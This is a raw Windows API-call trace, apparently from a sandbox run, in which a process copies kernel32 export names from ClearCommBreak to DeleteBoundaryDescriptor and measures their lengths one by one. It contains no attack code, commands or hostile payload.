[0185.474] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.474] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.474] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.474] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.474] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.474] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.474] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.474] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.475] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.475] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.475] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.475] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.475] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.475] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.475] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.475] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.475] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.475] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.475] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.475] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.475] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.475] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.475] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.475] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.475] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.475] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.475] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.476] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.476] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.476] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.476] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.476] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.476] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.476] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.476] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.476] lstrlenA (lpString="COPYFILEA") returned 9 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.476] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.476] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.476] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.476] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.476] lstrlenA (lpString="COPYFILEW") returned 9 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.476] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.476] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.476] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.476] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.477] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.477] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.477] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.477] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.477] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.477] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.477] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.477] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.477] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.477] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.477] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.477] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.477] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.477] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.477] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.477] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.477] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.477] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.477] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.478] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.478] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.478] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.478] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.478] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.478] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.478] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.478] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.478] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.478] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.478] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.478] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.478] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.478] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.478] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.478] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.478] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.478] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.478] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.479] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.479] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.479] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.479] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.479] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.479] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.479] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.479] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.479] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.479] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.479] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.479] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.479] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.479] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.479] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.479] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.479] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.479] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.479] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.480] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.480] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.480] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.480] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.480] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.480] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.480] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.480] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.480] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.480] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.480] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.480] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.480] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.480] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.480] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.480] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.480] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.480] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.480] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.481] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.481] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.481] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.481] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.481] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.481] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.481] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.481] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.481] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.481] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.481] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.481] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.481] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.481] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.481] lstrlenA (lpString="DELETEATOM") returned 10 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.481] lstrlenA 